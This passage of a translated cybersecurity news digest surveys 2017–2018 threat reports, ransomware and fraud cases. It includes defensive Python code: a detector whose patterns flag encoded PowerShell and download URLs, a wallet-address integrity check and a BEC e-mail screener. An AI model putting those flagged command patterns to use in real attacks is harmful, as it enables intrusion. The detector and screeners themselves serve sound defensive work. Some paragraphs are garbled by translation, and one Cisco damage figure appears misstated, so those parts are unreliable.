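    if parent not in OFFICE_PARENTS or image not in LOLBINS:
        return None
    reasons = [f"{parent} spawned {image}"]
    cmd = m["cmdline"].lower()
    if " -enc" in cmd or "-encodedcommand" in cmd:
        reasons.append("encoded PowerShell command")
    if "hidden" in cmd:
        reasons.append("hidden window")
    if "http://" in cmd or "https://" in cmd:
        reasons.append("download URL in command line")
    return Finding(m["ts"], m["host"], parent, image, tuple(reasons))


def scan(log_text):
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.host}: {'; '.join(f.reasons)}")
```

Only two of the five constructed lines are reported: the Word process launching PowerShell with an encoded command and hidden window, and the Excel process launching a shell whose command line carries a download URL. The parent/child pair alone is the trigger; the command-line checks only add context for triage, so a benign-looking command line does not suppress the alert.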

Cisco Annual Cybersecurity Report

Malware keeps improving: today attackers use cloud services and evade detection with encryption, which helps hide command-and-control activity. According to Cisco's 11th cyber security report (Cisco 2018 Annual Cybersecurity Report, [14]), to reduce the time needed to detect attackers, cyber security specialists are increasingly beginning to use (and buy) tools based on artificial intelligence (AI) and machine learning (ML).

On the one hand, encryption helps strengthen protection; on the other, the growth in the volume of both legitimate and malicious encrypted traffic (50% as of October 2017) makes it harder to identify potential threats and monitor their activity. Over the last 12 months Cisco information security specialists recorded more than a threefold growth in encrypted network traffic from the inspected malware samples.

Machine learning helps increase the effectiveness of network protection and will eventually allow automatic detection of non-standard patterns in encrypted web traffic, in the cloud and in IoT environments. Some of the 3,600 chief information security officers polled for the Cisco 2018 Security Capabilities Benchmark Study said that they trust tools such as ML and AI and would like to use them, but are disappointed by the large number of false positives. ML and AI technologies, now at the beginning of their development, will improve and eventually learn to determine the "normal" activity of the networks they monitor.

Selected results of the Cisco 2018 Annual Cybersecurity Report

Financial damage from attacks is becoming more and more tangible

  • According to respondents, more than half of all attacks caused financial damage of more than 500 million dollars, including loss of income, customer churn, lost profit and direct costs.

Supply chain attacks are becoming more complex and gaining speed

  • Such attacks can hit computers on a large scale, and their effect can last for months or even years. Organizations should bear in mind the potential risks of using software and hardware from organizations that do not take information security seriously.
  • In 2017 two such attacks infected users with the Nyetya and CCleaner malware via trusted software.
  • To reduce the risk of a supply chain attack, it is necessary to review third parties' procedures for testing the effectiveness of their information security technologies.

Defense is getting harder, and vulnerabilities are becoming more diverse

To protect themselves, organizations use complex combinations of products from different vendors. This complexity, together with the growing variety of vulnerabilities, adversely affects organizations' ability to repel attacks and also increases the risk of financial losses.

  • In 2017 25% of information security specialists reported using products from 11 to 20 vendors; in 2016 18% gave that answer.
  • Information security specialists reported that 32% of vulnerabilities affected more than half of their systems; in 2016 the figure was 15%.

Information security specialists rated the usefulness of behavioural analysis tools for identifying malicious objects

  • 92% of specialists believe that behavioural analysis tools cope well with the task.
  • Two thirds of healthcare and financial services representatives consider behavioural analytics useful for identifying malicious objects.

Use of cloud computing is growing; attackers exploit the lack of advanced security controls

  • This year 27% of information security specialists reported using external private clouds (20% in 2016).
  • Of them, 57% host their network in the cloud for better data protection, 48% for scalability and 46% for ease of operation.
  • Although the cloud provides improved data security, attackers exploit the fact that organizations are not coping well with protecting their developing and expanding cloud configurations. The effectiveness of protection of such configurations is increased by combining advanced techniques, advanced security technologies such as machine learning, and first-line defenses such as cloud security platforms.

Trends in malware volume and time to detection

  • Cisco's median time to detection (TTD) from November 2016 to October 2017 was about 4.6 hours. In November 2015 this indicator was 39 hours, and according to the Cisco 2017 cyber security report, the median time to detection from November 2015 to October 2016 was 14 hours.
  • Cloud-based security intelligence became a key factor for Cisco in reducing time to detection and keeping it low. The shorter the detection time, the faster the attack is repelled.

Additional recommendations for information security departments:

  • enforcing corporate policies and practices for updating applications, systems and devices;
  • obtaining accurate threat data in a timely manner and having processes that allow these data to be used for security management;
  • performing in-depth and advanced analysis;
  • regular data backups and verification of recovery procedures, which are critical given the rapid evolution of network ransomware and destructive malware;
  • checking the security of microservices, cloud services and application administration systems.

Charges against members of the Infraud group

On February 7, 2018 the U.S. Department of Justice announced charges against 36 members of the Infraud cybercriminal group, whose activity caused damage to consumers, businesses and financial institutions of more than $530 million. The hackers had intended to steal more than $2.2 billion. Read more here.

The Internet is threatened by fragmentation because of cyber attacks

As a result of cross-border cyber attacks, the Internet may break up into separate national and regional segments. This is stated in the Global Risks 2018 report presented at the World Economic Forum (WEF) in Geneva.

Fragmentation of the global network could lead to the cessation of its functions and slow technical progress. Development of cyber security will help prevent the Internet from splitting into parts. According to the report's authors, dialogue between governments and technology companies will play a major role in this.

According to the report, more attention is now paid to developing offensive rather than defensive capabilities in cyberspace. This creates a "fog of uncertainty in which the potential for miscalculation could trigger a spiral of retaliatory measures", the TASS news agency quotes the report as saying. In turn, retaliation can cause a chain reaction, the authors note.

There is a probability that the source of a cyber attack will be identified incorrectly and the retaliatory strike will hit an innocent target. That target will then also strike back, and the circle of parties involved in the conflict will widen. As a result of attacks on the wrong targets, not only cyber weapons but even physical ones could be put to use.

The use of conventional weapons is now regulated by law, and similar standards need to be developed for the conduct of cyber warfare, the report's authors are sure. Such regulations could be used to prohibit entire classes of cyber weapons, as has been done with chemical and biological weapons.

A clinic paid $55 thousand to cyber extortionists

At the beginning of January 2018 the Hancock Health clinic in the American city of Greenfield, Indiana was hit by a hacker attack using the SamSam ransomware, which paralyzed the medical institution's work at the height of a flu epidemic in the state. To recover the data faster, the hospital management paid the extortionists a ransom of 4 bitcoins, which at the time of payment was about $55 thousand. Read more here.


Trends from PandaLabs

  • More than half of attacks are motivated by the desire to make money from them, while espionage became the second main motivating factor.
  • Stealthy attacks with adaptive lateral movement are becoming a very widespread phenomenon.
  • Attackers increasingly carry out attacks without using malware. They prefer to remain unnoticed by traditional protection models, without requiring interaction with the victim. When executed optimally, such attacks can double the profit obtained.
  • Exploitation tools have generated new attack vectors that also do not require interaction with the victim.
  • The target is endpoint devices. The perimeter has become blurred, mobility is the norm for practically any company, and so corporate networks have become more and more vulnerable.
  • Former employees try to blackmail their previous employers, initiating attacks from within the companies.
  • Also, in 2017 we observed an increasingly broad presence of organized cybercriminal groups, such as the Lazarus Group, attacking the media, aerospace and financial sectors as well as critical infrastructure in the USA and other countries.
  • Cyber wars and cyber armies: a full-scale arms race is underway in cyberspace, and many states are creating cyber command centers to raise the level of protection against attacks aimed at companies and infrastructure.

Results of the year and forecasts from Positive Technologies

The past year, according to Positive Technologies experts, was marked by the following events and trends:

  • Ransomware. The lack of relevant updates and the habit of living with vulnerabilities led to stoppages at Renault plants in France and Honda and Nissan plants in Japan; banks, schools, energy and telecommunications companies suffered.
  • Practical security. The fight against "paper security" began at the highest level. Federal Law No. 187-FZ "On the security of critical information infrastructure of the Russian Federation" does not merely recommend but obliges state and commercial companies to protect themselves, and introduces mechanisms for monitoring the implementation of protective measures.
  • Telecom vulnerabilities began to be exploited. Attackers began intercepting two-factor authentication codes using vulnerabilities in the SS7 signalling protocol. The first to suffer were O2 Telefonica subscribers.
  • "Scalable" attacks on ATMs. ATMs have long been robbed in various ways, for example by tying them to a car with a rope and driving off. But when cybercriminals began connecting to a bank's local network and remotely controlling many ATMs at once, banks had serious cause for concern.
  • Covert mining. In spring 2017 our experts detected hundreds of computers in large companies that were mining cryptocurrency for unknown hackers. The miner used the same vulnerability as WannaCry, and protected the captured PCs from the ransomware.
  • Entry through IoT. The noise around IoT security caused by botnets and DDoS attacks had not yet died down when unprotected "smart" coffee machines began to be used to halt petrochemical plants, and smart aquariums for attacks on casinos.
  • Bitcoin and the vulnerable web. By the end of the year bitcoin had overtaken the Russian ruble in capitalization, and hackers turned their attention to blockchain startups. The simplest attack scheme is to find vulnerabilities on an ICO website and change the wallet address for collecting investments. The Israeli CoinDash lost $7.5 million this way.
  • Epidemic of targeted attacks. The number of companies that faced APT attacks in 2017 almost doubled. At the same time attacks are becoming more complex before our eyes, and methods that complicate incident analysis and investigation are being actively applied.
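The ICO case in the list above (a wallet address swapped on a fundraising page) is a textbook reason to monitor published payment details against a pinned value rather than trusting the live page. The following is an added example, not from the Positive Technologies report or the CoinDash project: it extracts Ethereum-style addresses from a page snapshot, alerts when the pinned address is missing or an unexpected one appears, and optionally compares the page digest with the last approved snapshot. The page snapshots and addresses are constructed for illustration.

```python
"""Added example: integrity check for a fundraising page's published wallet
address. Snapshots and addresses are constructed; the pinned address is a
hypothetical value a project would set from its own records."""
import hashlib
import re

# Ethereum-style address: 0x followed by 40 hex digits.
ADDRESS_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")

# Constructed pinned value: the address the project actually controls (hypothetical).
EXPECTED_ADDRESS = "0x" + "1" * 40
# Constructed attacker-substituted address used only to build the tampered snapshot.
_SWAPPED_ADDRESS = "0x" + "2" * 40

# Constructed snapshots of the same page before and after a hypothetical tampering.
PAGE_OK = (
    "<html><body><h1>Token sale</h1>\n"
    f"<p>Send ETH to <code>{EXPECTED_ADDRESS}</code></p></body></html>"
)
PAGE_TAMPERED = (
    "<html><body><h1>Token sale</h1>\n"
    f"<p>Send ETH to <code>{_SWAPPED_ADDRESS}</code></p></body></html>"
)


def extract_addresses(html):
    """All distinct addresses on the page, lower-cased so casing does not matter."""
    return sorted({a.lower() for a in ADDRESS_RE.findall(html)})


def page_digest(html):
    """SHA-256 of the raw page, used to pin an approved snapshot."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def check_page(html, expected=EXPECTED_ADDRESS, baseline_digest=None):
    """Return a list of alert strings; an empty list means the page looks intact."""
    alerts = []
    found = extract_addresses(html)
    if expected.lower() not in found:
        alerts.append(f"expected address {expected} missing from page")
    for addr in found:
        if addr != expected.lower():
            alerts.append(f"unexpected address {addr} published on page")
    if baseline_digest is not None and page_digest(html) != baseline_digest:
        alerts.append("page content changed since last approved snapshot")
    return alerts


if __name__ == "__main__":
    baseline = page_digest(PAGE_OK)
    print("ok page:", check_page(PAGE_OK, baseline_digest=baseline))
    print("tampered page:", check_page(PAGE_TAMPERED, baseline_digest=baseline))
```

In practice the check runs from a monitoring host that fetches the live page on a schedule; the address comparison catches the substitution itself, while the digest comparison catches any other unreviewed change (for example an injected script) even when the address text still looks right.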

Among forecasts for 2018, Positive Technologies experts note the following:

  • Growing interest in creating security operations centers (SOC) became the response to the increasing complexity of attacks. This year alone about 10 companies started creating a SOC in one form or another. In 2018 the number of SOCs will triple.
  • The State System for Detection, Prevention and Elimination of the Consequences of Computer Attacks and the requirements of Law No. 187-FZ do not guarantee that a system cannot be hacked, but fulfilling these requirements and creating centers of that system will make it possible to cut off 90% of primitive attacks, allowing defenders to concentrate on high-level ones.
  • The growth in logical attacks on ATMs (in the first half of 2017 alone the total number of such attacks in European countries grew by 500%) will continue. Banks, in turn, will take an even more active interest in the real threats that cause financial losses and in assessing risks.
  • Vulnerabilities in mobile networks can cost human lives. Autonomous cars use mobile networks to exchange data on speed, the position of cars on the route and other information. DDoS attacks can literally leave such a car without "senses and eyes". Another example is smart traffic lights connected to mobile networks. Within working groups our experts drew mobile operators' attention to the insecurity of the Diameter protocol. As a result, operators decided to abandon the Diameter protocol in next-generation 5G networks and replace it with an alternative.
  • Attackers' attention will turn to web wallets: they are convenient but insecure, and sooner or later they will be hacked. We also predict growth in the number of hacks of blockchain projects' web applications via phishing.
  • Hardware attacks, such as exploitation of the vulnerability in Intel Management Engine, are expected to see a renaissance. If attackers manage to use them, this will enable targeted attacks as well as cryptolocker attacks in which data is not just locked at another level but the motherboard itself is disabled.

Trend Micro forecasts

In December 2017 Trend Micro published its annual report with information security forecasts for 2018, "Paradigm Shifts: Information Security Forecasts for 2018" (Paradigm Shifts:[15]). According to the forecasts, the use of known vulnerabilities in attacks will increase as a result of the growing attack surface of modern enterprises, which opens more and more gaps in protection. To protect the organization's most valuable data, management should shift priorities toward patch management and employee training.

As stated in the report, Trend Micro forecasts that in 2018, as information technology (IT) and operational technology (OT) converge, enterprise applications and platforms will be exposed to the risk of manipulation and vulnerabilities. Trend Micro also predicts growth in the number of vulnerabilities in the Internet of Things (IoT) as more and more devices are made without following safety rules and industry standards. In general, growing network connectivity and the increased attack surface create new opportunities for cybercriminals who use known flaws in protection to penetrate corporate networks.

Ransomware will remain a key component of the cyberthreat landscape, as it has proved its success. The company expects an increase in targeted ransomware attacks in which individual enterprises are put at risk and their executives are then forced to pay a larger ransom. Business email compromise (BEC attacks) will also gain popularity among attackers as the payoff from a successful attack is very high.

Cybercriminals will also increasingly use technologies with growing influence, blockchain and machine learning, to mask their activity from traditional data protection methods. For this reason Trend Micro recommends a layered strategy using security technologies of different generations, which combines advanced security tools backed by the company's almost 30 years of experience in protecting the world's largest brands.

Main conclusions:

  • According to experts' forecasts, global losses from BEC attacks in 2018 will exceed $9 billion.
  • Cybercriminals will begin to use machine learning and blockchain technologies in their hacking techniques. The DAO (Decentralized Autonomous Organization), the first decentralized venture fund built on the Ethereum blockchain, suffered a large-scale attack. As a result of the exploitation of an error in the DAO code, more than $50 million in digital currency disappeared from project accounts.
  • In 2018 ransomware will remain the main tool for making profit, although other types of cybercrime will gain momentum.
  • In 2018 cybercriminals will find new ways to exploit gaps in IoT devices for their own benefit. Besides DDoS attacks, attackers will use IoT devices to create proxy servers in order to hide their true location and web traffic. The reason for this trend is that when conducting investigations the police most often rely on the IP address in logs. More and more devices that have made their way into homes, such as biometric trackers, drones, speakers, voice assistants, etc., will be hacked in order to extract the data accumulated on them.
  • Corporate applications and platforms will be subject to the risk of misuse and vulnerabilities. SAP and other enterprise resource planning systems can be hacked. If the processed data is modified or a wrong command is sent to an ERP system, computing equipment can become an instrument of sabotage, leading to wrong decisions such as incorrect resource volumes, unwanted money transfers and even system overloads.
  • Cyber propaganda campaigns will become sharper thanks to already proven spam mailing techniques.
  • Most companies will begin to comply with the European personal data protection law (General Data Protection Regulation, GDPR) only after the first high-profile legal case.

US intelligence agencies: Islamic State has "gone" to the virtual world

After its defeat in Syria, the Islamic State (IS) terrorist organization has relocated to cyberspace. This assumption was made at the beginning of December 2017 by representatives of US intelligence agencies.

IS's ability to contact people sympathizing with it through social networks is unprecedented and gives the organization the chance to reach a large number of extremists in different countries, emphasized Lora Shiao, head of intelligence at the US National Counterterrorism Center.

Thus, according to intelligence representatives, terrorists will continue to promote their ideology by means of the Internet.

Ron Johnson, a member of the committee on homeland security and governmental affairs, also believes that "the new caliphate" is now located in cyberspace.[16]

PwC: Russian companies are on a par with American ones in cyber security level

60% of Russian companies have a cyber security strategy. In this respect Russia has overtaken Germany (45%), France (51%) and Italy (55%) and is level with the USA (also 60%). Izvestia reports this with reference to the report of the consulting company PricewaterhouseCoopers (PwC) [17].

According to the report, the countries best protected against cyber attacks are Malaysia (74%), Japan (72%) and Indonesia (70%). The main difference between Russian and foreign companies is that not all Russian companies select and apply international cyber security standards in practice, and as a result individual aspects of protection against cyberthreats are often missed. Abroad, such standards are often mandatory.

According to the report, Russian companies consider the most serious cyberthreats to be breaches of data confidentiality (48%), disruption of the company's normal operations (47%), a decline in product quality (27%) and threats to life (21%).

As noted in the report, most employees of the Russian companies polled named phishing attacks as the main cause of cyber incidents. In second place was the use of mobile devices, which more than a quarter of respondents pointed to.

As experts noted, the public sector spends the most on protection against cyberthreats. State bodies buy protective software and hardware in large volumes and implement large IT projects. At the same time, banks lead in the effectiveness of their protection against cyber incidents.

Specialists also note that Russia and the USA are world leaders in cyber security. Having achieved a certain level of progress in this market, the Russian Federation will be able to export cyber security products and services abroad, they believe.

Kaspersky Lab data

According to a Kaspersky Lab study involving more than 350 representatives of industrial organizations worldwide, including Russia, over the last 12 months every second industrial company in the world experienced from one to five cyber incidents that affected critical infrastructure or automated process control systems (APCS) at these enterprises. Each company spent on average $497 thousand on eliminating the consequences of the incidents that occurred within the year.

The poll also showed that encountering cyberthreats did not come as a surprise to industrial enterprises: three quarters of companies consider it probable that they will suffer a cyber attack. Moreover, 83% of respondents consider themselves well prepared for an incident occurring in their industrial infrastructure.

Companies today are most afraid of the possibility of malware infection. And reality shows that this fear is not in vain: 53% of enterprises that were victims of incidents confirmed encounters with various malware. Moreover, about a third of companies (36%) were subjected to targeted attacks. Thus, malware and well-planned targeted operations became the dominant threats to industrial and critical infrastructure.

At the same time, the study showed that companies often underestimate internal threats while fearing external risks. Thus, 44% of organizations believe that their cyber security is most likely to be threatened by third parties, for example suppliers. And 33% believe that ransomware poses the greatest danger to them. However, cyber incidents in industrial networks more often occur because of errors and inadvertent actions by personnel; this factor threatened nearly a third (29%) of companies.

How a fraudster cheated airlines of 32 million dollars and got 5 years

In June 2017 a fraudster who caused $32 million in damage to airlines and travel agencies was sentenced in the USA to nearly five years in prison. The 32-year-old Cameroonian citizen Eric Donys Simeu had pleaded guilty in December 2016.[18]

As follows from court documents, for a considerable period Simeu and his accomplices sent phishing emails on behalf of Travelport and SABRE, the largest operators of global distribution systems, to their main clients, including airlines and airline ticket agents. The victims were lured to a malicious website where they had to enter their logins and passwords. The attackers then used these to gain access to the distribution systems' networks.

In June 2017 a fraudster who caused millions of dollars in damage to airlines and travel agencies was sentenced in the USA to nearly five years in prison

As a result, between July 2011 and September 2014 Simeu and his accomplices fraudulently ordered air tickets worth more than two million dollars. These tickets were either resold at very high prices to residents of West African countries or used by gang members for their own travel.

Simeu was detained in September 2014 at Paris Charles de Gaulle airport. As it turned out, an international arrest warrant had already been issued for him by then. After 18 months in a French prison, Simeu was extradited to the USA, where he appeared before the court. His guilty plea earned him a relatively light punishment: four years and ten months in prison and compensation of 162,146 dollars to Travelport.

"Fraud costs global business billions of dollars annually, while attackers' methods are hardly varied: there is nothing new in the scheme that Simeu and his accomplices, who remain unknown, worked on," notes Dmitry Gvozdev, CEO of Security Monitor. "Simeu has finally been sent to jail, but if you think about it, for three years his accomplices could not be found and remain unknown, and the damage remains uncompensated. Besides, one phishing fraudster is a drop in the ocean. The key to effective protection against such fraud is regular training of users, above all corporate employees, on how to recognize phishing attempts and counter them."

Russian hackers got an opportunity for industrial espionage with NSA exploits

In May 2017 The Shadow Brokers group announced that it would henceforth distribute all exploits and hacking tools only by subscription. Previously the group had published them openly. Now interested parties would have to pay about 20 thousand dollars a month, in the Zcash cryptocurrency.[19]

The subscription, which The Shadow Brokers call the "Wine of Month Club"[20], will cost potential subscribers a hefty sum: 100 ZEC per month. ZEC is the new Zcash cryptocurrency that appeared in October 2016[21].

The Shadow Brokers group asks more than $20,000 for access to new exploits

The "brokers" note, however, that they may change the payment system at any time. As of the end of May 2017, 100 Zcash was worth about $21 thousand. Once the required sum is paid and contact information provided, links to the archive with exploits and the password to it will be sent.

As for the contents of the June archive, the "brokers" do not disclose it. They only note that it will interest hackers, companies dealing with IT security, governments and OEM suppliers. A July "sale" has also been pre-announced, but The Shadow Brokers have not yet decided what to include in it and what not.

"The Shadow Brokers have not yet decided. Something valuable to somebody," the group's members write in their "corporate" broken English. "... The time of 'I'll show you mine if you show me yours first' is coming to an end. People see what happens when The Shadow Brokers show theirs first. That is the wrong question. The question that should be asked is: 'Can my organization afford not to be first to get access to The Shadow Brokers' archive?'"

The Shadow Brokers group is known only as the distributor of hacking tools stolen from Equation, a group closely linked to the U.S. National Security Agency. Most of these exploits target vulnerabilities in Microsoft products.

In 2016 The Shadow Brokers tried several times to make money from their haul, offering exploits for sale or trying to raise money through crowdfunding. In April 2017 The Shadow Brokers publicly released the password to the archives of malicious tools they had previously tried to sell, and then, on April 14, released a new archive with a set of exploits for Windows, including ETERNALBLUE, DARKPULSAR and others.

The ETERNALBLUE exploit was soon used by creators of the WannaCry worm encoder whose distribution purchased the nature of global epidemic. And it in spite of the fact that a month before release Microsoft released the updates correcting everything or the most part of vulnerabilities to which exploits of the NSA were directed.

The exposed price is rather high, however it is possible that the plan of The Shadow Brokers will work — Dmitry Gvozdev, the CEO of Security reference monitor company says. — All concerned parties already had an opportunity to be convinced that at the disposal of grouping - really working and very dangerous tools. So the assumption of that, as the governments, and cybercrime - including Russian - will agree to invest so large means for the sake of receiving this weapon in the order. In general it does not mean anything good for the sphere of cyber security.

The largest cyber scheme in the financial market

On May 22, 2017 a U.S. court sentenced the Ukrainian hacker Vadim Yermolovich to 2.5 years in prison for participating in a criminal scheme that allowed its members to earn more than $100 million, the U.S. Department of Justice said in a statement.

The sentence on the 29-year-old Ukrainian, detained in 2014, was handed down by Judge Madeline Cox Arleo of the Newark court (New Jersey, USA). Acting U.S. Attorney William Fitzpatrick announced the verdict publicly.

The Ukrainian hacker received 2.5 years in prison for thefts totalling $100 million

Vadim Yermolovich pleaded guilty to conspiracy to commit computer hacking and theft of personal data. The fraudsters stole press releases from companies before their official publication and sold the insider information to traders, who then used it to profit on the stock market.

Russian traders also took part in the fraud. They drew up lists of press releases and of the companies the hackers should target first. Among them were Caterpillar, Home Depot and Panera Bread.

According to the U.S. authorities, between February 2010 and August 2015 the hackers stole more than 150 thousand corporate press releases intended for the media from the Business Wire, Marketwired and PR Newswire portals. The cybercriminals earned about $100 million from this.

Reuters notes that this is the largest known hacking scheme used for playing the financial markets, and 29-year-old Vadim Yermolovich from Kiev became the first member of the group to admit his crimes. Taking this mitigating circumstance into account, the judge sentenced him to 30 months in prison.

The U.S. Securities and Exchange Commission brought charges against more than 40 people. Ten defendants, three hackers and seven traders, are being tried in New Jersey and New York. Five people have confessed.[22]

Cyber extortionists demand almost four times larger ransoms from their victims

The average ransom demanded by cyber extortionists from their victims grew by 266% in 2016, according to the annual Internet Security Threat Report prepared by the cybersecurity company Symantec.[23]

In 2015 attackers who encrypt data on a computer with malware (ransomware) and demand money to unlock it asked users for $294 on average. In 2016, however, the amount rose to $1,077, the specialists found.


Experts name the victims' readiness to pay as the main reason for the fast-growing appetites of cyber extortionists. As a rule, the criminals demand the ransom in cryptocurrency, since it provides anonymity and irreversibility of transactions. According to Symantec, 34% of users worldwide who face ransomware agree to transfer the demanded amount. However, paying the ransom does not guarantee that the user will get the data back: only 47% of victims regain access to the encrypted files after paying, the experts warn.

In the USA, meanwhile, victims of cyber extortionists pay even more willingly: 64% of users agree to the criminals' demands. Symantec believes this is why the United States leads in the number of registered extortion cases. In 2016 34% of all recorded ransomware infections fell on this country. Japan and Italy complete the top three, with 9% and 7%. The statistics show that hackers more often attack developed countries with stable economies.

Russia is also among the ten countries most popular with cybercriminals. According to Symantec, last year 3% of cyber extortion cases fell on the Russian Federation. The same figure, 3%, applied to the Netherlands, Germany, Australia and Great Britain, while Canada and India accounted for 4% each.

Interpol: cyber fraud in West Africa has become a source of wealth and an object of worship

In March 2017 it became known that over the last three years fraudsters from West Africa have caused Western businesses $3 billion in damage, according to the results of a study conducted by experts from Interpol and Trend Micro.[24]

Earning money through fraudulent schemes has become so popular in West African countries that in Ghana, for example, Internet fraud has even acquired its own patron spirit.


As noted in the study, in recent years attackers have most often used the scheme called Business Email Compromise (BEC). Attackers using such schemes send potential victims false but very authentic-looking invoices for payment, as well as counterfeit memos, in the hope that one of the company's finance staff will take the bait and transfer money to the fraudsters' accounts.

Sometimes these messages contain attachments with keyloggers; with a successful combination of circumstances, the attackers gain access to the victims' bank accounts and can transfer money directly.

Between October 2013 and May 2016 fraudsters using BEC schemes took more than three billion dollars from Western companies. In the United States alone, businesses lost nearly one billion dollars over this period. Sometimes, but alas not always, payments to the fraudsters can be cancelled and the funds recovered.
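As an added illustration (not code from the Interpol/Trend Micro study), the following Python heuristic screens an inbound invoice e-mail for the signs of the BEC scheme described above: a sender domain that imitates a known supplier, a Reply-To header pointing elsewhere, a request to change payment details under time pressure, and an executable attachment of the kind used to deliver keyloggers. All domains, addresses and messages are constructed for the example.

```python
"""Heuristic screening of inbound invoice e-mails for BEC warning signs.
Added example for this article, not Interpol's or Trend Micro's code; every
address, domain and message below is constructed for illustration."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed allow-list: domains of suppliers the (hypothetical) company actually pays.
KNOWN_VENDOR_DOMAINS = {"example-vendor.com", "supplies-example.net"}

# Phrases typical of a request to redirect a payment (matched case-insensitively).
PAYMENT_CHANGE_PATTERNS = [
    r"\bnew bank (account|details)\b",
    r"\bupdated? (our )?(bank|account|payment) (details|information)\b",
    r"\bwire (the )?(payment|funds) to\b",
]
URGENCY_PATTERNS = [r"\burgent(ly)?\b", r"\bimmediately\b", r"\btoday\b"]
# Attachment extensions that should never arrive with an invoice (typical keylogger droppers).
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".js", ".vbs", ".jar", ".bat")


@dataclass
class Message:
    display_name: str
    from_addr: str
    reply_to: str          # empty string when the header is absent
    subject: str
    body: str
    attachments: list = field(default_factory=list)


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(domain: str) -> str:
    """Collapse common homoglyph substitutions so that examp1e == example and rn == m."""
    return domain.lower().replace("rn", "m").replace("vv", "w").replace("1", "l").replace("0", "o")


def lookalike(domain: str, known: set) -> Optional[str]:
    """Return the known vendor domain that `domain` imitates, or None.
    A domain that is itself on the allow-list is never reported as a lookalike."""
    if domain in known:
        return None
    for k in known:
        if normalize(domain) == normalize(k) or edit_distance(domain, k) <= 2:
            return k
    return None


def screen(msg: Message) -> list:
    """Return the list of BEC warning signs found in one invoice e-mail."""
    reasons = []
    sender = domain_of(msg.from_addr)
    imitated = lookalike(sender, KNOWN_VENDOR_DOMAINS)
    if imitated:
        reasons.append(f"sender domain {sender} imitates known vendor {imitated}")
    elif sender not in KNOWN_VENDOR_DOMAINS:
        reasons.append(f"invoice from unknown domain {sender}")
    # A Reply-To pointing elsewhere diverts the conversation away from the real vendor.
    if msg.reply_to and domain_of(msg.reply_to) != sender:
        reasons.append("Reply-To domain differs from From domain")
    text = f"{msg.subject}\n{msg.body}".lower()
    if any(re.search(p, text) for p in PAYMENT_CHANGE_PATTERNS):
        reasons.append("requests a change of payment details")
    if any(re.search(p, text) for p in URGENCY_PATTERNS):
        reasons.append("applies time pressure")
    for name in msg.attachments:
        if name.lower().endswith(EXECUTABLE_EXTENSIONS):
            reasons.append(f"executable attachment {name}")
    return reasons


def verdict(reasons: list) -> str:
    """Two or more independent signs: hold the payment and verify out of band."""
    return "hold for manual verification" if len(reasons) >= 2 else "ok"


# Constructed sample messages: a genuine invoice and a BEC attempt imitating the same vendor.
LEGIT = Message("Example Vendor Billing", "billing@example-vendor.com", "",
                "Invoice 1041 for April",
                "Please find attached invoice 1041. Payment terms net 30 as agreed.",
                ["invoice_1041.pdf"])
FRAUD = Message("Example Vendor Billing", "billing@examp1e-vendor.com",
                "billing.examp1e@mail-example.org",
                "Invoice 1041 - updated bank details",
                "Please note our updated bank details and wire the payment to the new "
                "account today. Open the attached invoice for the new account number.",
                ["invoice_1041.pdf.exe"])

if __name__ == "__main__":
    for m in (LEGIT, FRAUD):
        r = screen(m)
        print(m.from_addr, "->", verdict(r), r)
```

The heuristic only raises a hold for manual checking; the actual control that defeats BEC is out-of-band confirmation of any change in payment details with the supplier through a previously known channel.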

West African cyber fraudsters are increasingly using schemes more complex than before, carrying out more thoroughly planned operations and applying ever more sophisticated business models; the focus is shifting, in particular, towards BEC and tax fraud, the report says. Thanks to their experience and ingenuity in social engineering, and to a rich malicious toolset (keyloggers, remote administration tools, ransomware and antivirus evasion tools), West African cybercriminals steal large amounts of money from individual users and businesses worldwide.

The reason why West Africa has become a breeding ground for cyber fraud is quite transparent: nearly half of university graduates there cannot find work for at least a year after graduation. Participation in cyber fraud schemes appears a very attractive alternative to poverty and hunger.

It is mainly from such educated young people who have failed to settle down that the "teams" of cyber fraudsters are formed. Interpol and Trend Micro researchers identified two large groups operating in West Africa.

The first are the so-called Yahoo! Boys, who engage mainly in traditional types of fraud such as "Nigerian" spam. In addition, the Yahoo! Boys actively live off romance scams and spam with requests to urgently send money to a traveller who has allegedly got into trouble abroad.

The name Yahoo! Boys was earned because until very recently they coordinated their actions through the Yahoo portal chat. Typical members of this group are young people in their twenties who very much like to brag about their wealth on social networks. Although their fraud methods are quite simple and banal, they still bring them considerable income.

A far bigger threat is posed by higher-level criminals (Next Level Criminals).

Their professional level is very high. Before carrying out their operations they actively collect information on potential victims (mostly of a financial nature) from all possible sources and thereby make their attacks more effective.

In addition, these fraudsters control an extensive network of "money mules", people who, for a small commission, quickly cash out the stolen funds.

Criminals of this kind literally earn billions, though unlike the Yahoo! Boys they prefer not to advertise their status. Interpol tries from time to time to fight these criminals, but such efforts rarely succeed. In only 30% of cases where data is handed to local police is the criminal arrested.

The Trend Micro report notes that the criminal culture of West Africa has created a certain mentality that justifies fraud; some hold that this culture even encourages such actions, equating fraud with outwitting the victims, particularly foreigners. The most obvious example of this is "sakawa", a ritualized practice of online fraud in Ghana. Practitioners of sakawa believe that a higher entity grants fraudsters protection and success in their activity.

"Mythologized thinking and a veil of mystery are inherent to the hacker environment, as one dealing with confidential data and other people's secrets," says Dmitry Gvozdev, CEO of the Security reference monitor company. "And in the case of African hackers, who are often not very qualified and use ready-made developments of their European and American colleagues, the emergence of such a cargo cult does not seem surprising, especially if this information is not a really early April Fools' joke."

Danish deputies were afraid to take gadgets on a business trip to Russia

In March 2017 it became known that Danish deputies would travel to Russia without personal mobile devices and laptops because of fears that this electronics could be hacked.

On his Facebook page, former Danish Minister of Foreign Affairs Martin Lidegaard, representing the Social Liberal party, wrote the following:

"Farewell, smartphone. The Foreign Policy Committee recommended that we not take gadgets on the business trip to Russia for security reasons."

